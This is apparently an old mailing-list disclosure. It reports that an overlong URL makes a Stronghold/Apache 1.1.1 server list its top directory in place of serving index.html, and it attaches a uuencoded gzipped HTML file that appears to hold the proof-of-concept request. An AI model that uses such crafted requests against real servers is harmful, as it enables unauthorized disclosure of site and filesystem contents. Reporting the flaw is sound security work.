extra long URL attack

[strick () versant com (strick -- henry strickland)]

I don't know about CGI attacks, but this extra long URL to
my site running
        Server version Stronghold/1.3 Ben-SSL/1.3 Apache/1.1.1.
will show you the raw contents of the top directory
rather than the /index.html file (using Netscape Navigator 3.0 solaris
for a browser).

i've always wondered how safe it was to count on nobody seeing
past your index.html -- now i know.  I wonder if some varient
will get you the root directory of my entire filesystem instead
of just the top directory of my web.  I knew I should have
chrooted this stuff....

szia, strick


begin 644 xyz.html.gz
M'XL("(<RUS("`WAY>BYH=&UL`.W:00J#,!2$X7U.D1.\MR_6NZ3V21Z&6&R@
M>'M=B!0\0<O_S6)N,*L9YU+F3VS9W]'KL-C3'\5BZ%+,BXWWW-KKIFK5TR!K
MFJ1:4SFB(GK)60#^W[D&````````````````````P`_X.L'WH7B=.DV]A-T&
(-S/()ETO``#)
`
end